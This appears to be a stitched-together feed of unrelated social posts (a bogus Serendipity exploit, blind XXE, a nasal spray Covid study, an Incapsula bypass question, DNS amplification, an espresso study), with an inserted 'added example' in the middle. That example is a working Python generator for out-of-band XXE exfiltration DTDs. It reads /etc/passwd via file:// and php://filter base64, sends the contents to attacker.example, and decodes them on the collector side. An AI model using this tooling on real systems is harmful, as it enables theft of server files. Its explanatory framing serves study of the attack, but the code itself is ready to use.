I've recently stumbled upon an RCE "exploit" for the Serendipity blog software, which I happen to use and have contributed to in the past. From what I can tell, it does nothing interesting (it does not even work due to broken indents; if one fixes that, it uploads a PHP shell given existing credentials, but that won't be executed unless you have a server config that executes .inc files). I'm 95% certain this is bogus. Yet... in case anyone wants to have a look:
Dear Infosec people who have looked at XML and XXE before: I am trying to get an understanding of Blind XXE. Many of the descriptions I find are lacking an important detail which makes the attack much less practical. Blind XXE works by building a URL which contains the content of a file, allowing that content to be exfiltrated. However, in all my tests, that *only* works if the file contains no newlines, as those are not allowed in URLs. Am I missing something? 🧵
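As an added example (not code from the post above, nor from any tool it mentions), the script below generates the standard out-of-band XXE exfiltration DTD, shows the URL the victim's parser ends up requesting once entity expansion has substituted the file contents into it, and flags the characters that make a raw, one-shot exfiltration fail (newlines among them). It also shows the PHP-only workaround, the `php://filter` base64 wrapper, and the collector-side decoding. The collector host `attacker.example`, the target paths and `SAMPLE_FILE` are all assumptions for illustration.

```python
"""Added example, not the post author's code: out-of-band XXE DTD
generation plus a check for the newline problem described above.

Assumptions: the collector host attacker.example, the target paths,
and SAMPLE_FILE, which is constructed rather than captured anywhere."""

import base64

COLLECTOR = "http://attacker.example/collect"  # hypothetical attacker host

# Constructed stand-in for a multi-line target file.
SAMPLE_FILE = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "nobody:x:65534:65534::/nonexistent:/usr/sbin/nologin\n"
)

# Characters that break the injected <!ENTITY> declaration once the file
# contents are substituted into it: the inner SYSTEM literal is quoted
# with ', and % / & start entity references inside a DTD.
BREAKS_XML = {
    "'": "terminates the SYSTEM literal early",
    "%": "starts a parameter-entity reference",
    "&": "starts a general entity reference",
}
# Characters outside the RFC 3986 URI character set. Parsers differ in
# whether they escape, reject or truncate at them; newlines are the case
# the post observes failing.
BREAKS_URI = {
    "\n": "newline (LF)", "\r": "newline (CR)", " ": "space",
    '"': "double quote", "<": "less-than", ">": "greater-than",
}


def build_oob_dtd(resource, collector=COLLECTOR):
    """External DTD hosted by the attacker. The victim's parser reads
    `resource` into %file;, expands %eval; to define %exfil; (whose
    SYSTEM identifier now embeds the file contents), then dereferences
    %exfil;, sending the data to the collector. &#x25; is a '%' that
    survives being written inside an entity value."""
    return "\n".join([
        '<!ENTITY % file SYSTEM "' + resource + '">',
        '<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM \''
        + collector + '?d=%file;\'>">',
        "%eval;",
        "%exfil;",
    ]) + "\n"


def exfil_url(file_contents, collector=COLLECTOR):
    """The URL the parser would request: entity replacement is plain
    textual substitution, so nothing percent-encodes the file for you."""
    return collector + "?d=" + file_contents


def raw_exfil_problems(file_contents):
    """Reasons why sending `file_contents` raw in the URL would fail.
    An empty list means a single-line, URI-safe payload."""
    problems = []
    for ch, why in {**BREAKS_XML, **BREAKS_URI}.items():
        if ch in file_contents:
            problems.append(f"{why} ({ch!r})")
    return problems


def php_filter_resource(path):
    """PHP-only workaround: the php://filter stream wrapper hands the
    parser a base64 rendering of the file, which contains no newlines,
    quotes, '%' or '&' and so survives the URL. Only applies when the
    XML is parsed by PHP with stream wrappers available."""
    return "php://filter/convert.base64-encode/resource=" + path


def decode_exfil(query_value):
    """Collector side: recover the file from the ?d= value. If the web
    framework form-decoded the query string, '+' has become ' ', so undo
    that, and restore any '=' padding a URL-mangling hop stripped."""
    value = query_value.replace(" ", "+")
    value += "=" * (-len(value) % 4)
    return base64.b64decode(value).decode("utf-8")


if __name__ == "__main__":
    print(build_oob_dtd("file:///etc/passwd"))
    print("raw exfil problems:", raw_exfil_problems(SAMPLE_FILE))
    print(build_oob_dtd(php_filter_resource("/etc/passwd")))
    wire = base64.b64encode(SAMPLE_FILE.encode()).decode()
    print("base64 problems:", raw_exfil_problems(wire))
    print(decode_exfil(wire) == SAMPLE_FILE)
```

The base64 route only helps against PHP targets; for other parsers the file really does have to fit the URI character set, which is why single-line files (hostnames, tokens, keys without headers) are the usual blind-XXE trophies.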
There's a study indicating that a cheap nasal spray that is already on the market (for allergies) can reduce Covid 19 infection risk by ~2/3, and also reduce other respiratory infections. I'm somewhat torn between "too good to be true" and "any reason I shouldn't immediately buy and use this?" Anyone read any insightful (and particularly: skeptical, caveats) takes on it? https://jamanetwork.com/journals/jamainternalmedicine/fullarticle/2838335
Anyone happen to know if there's any easy trick to bypass an Incapsula "security firewall" that thinks downloading with curl/wget is an attack to be prevented? (It's not just the user agent, I tried that.)
In case I know anyone here who's familiar with the finer details of DNS and particularly DNS amplification attacks and their mitigations, I have some questions.
I went down a rabbit hole trying to understand some health issues, and I ended up with an idea for a study that involves Espresso and heart disease risks that would be relatively easy to perform and could help make more informed health decisions. My journey (and this is only one tiny aspect, I've been thinking about this a lot) started a bit more than a year ago when I got a blood test as part of a health checkup that contained some concerning values, notably high glucose and high LDL. 🧵